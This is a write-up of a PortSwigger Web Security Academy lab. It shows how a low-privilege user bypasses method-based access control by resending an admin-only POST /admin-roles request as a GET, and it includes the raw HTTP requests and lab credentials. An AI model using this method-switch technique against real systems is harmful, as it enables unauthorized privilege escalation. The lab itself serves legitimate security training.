| Field | Details |
|---|---|
| Platform | PortSwigger Web Security Academy |
| Type | Access Control (Method-Based Bypass) |
| Difficulty | Practitioner |
| Objective | Log in as wiener:peter and exploit the flawed access controls to promote yourself to administrator |
Method-Based Access Control Can Be Circumvented¶
Log in as administrator:admin.
There's a list to upgrade/downgrade users. Upgrading a user shows the request:
POST /admin-roles HTTP/2
Host: 0af400d604dcbaf180b4174000d6000e.web-security-academy.net
Cookie: session=LNJPhQ9dm3Ylr6TdAN9zJ4YyjtKpyjew
username=carlos&action=upgrade
Sending this upgrades carlos; changing action to downgrade downgrades him — both followed by a 302 redirect.
Logging in as wiener:peter.
Trying the same /admin-roles request as wiener:
POST /admin-roles HTTP/2
Host: 0af400d604dcbaf180b4174000d6000e.web-security-academy.net
Cookie: session=mQS61qNxftuEkWj6ozHt0sV30Qwy773E
username=wiener&action=upgrade
401 Unauthorized — POST /admin-roles is correctly restricted for non-admins. Switching the method to GET and moving the parameters into the query string:
GET /admin-roles?username=wiener&action=upgrade HTTP/2
Host: 0af400d604dcbaf180b4174000d6000e.web-security-academy.net
Cookie: session=mQS61qNxftuEkWj6ozHt0sV30Qwy773E
302 Found — the access control only checks the POST method, but the endpoint still processes the same action when reached via GET. Following the redirect:
wiener now has admin privileges, the lab is solved :P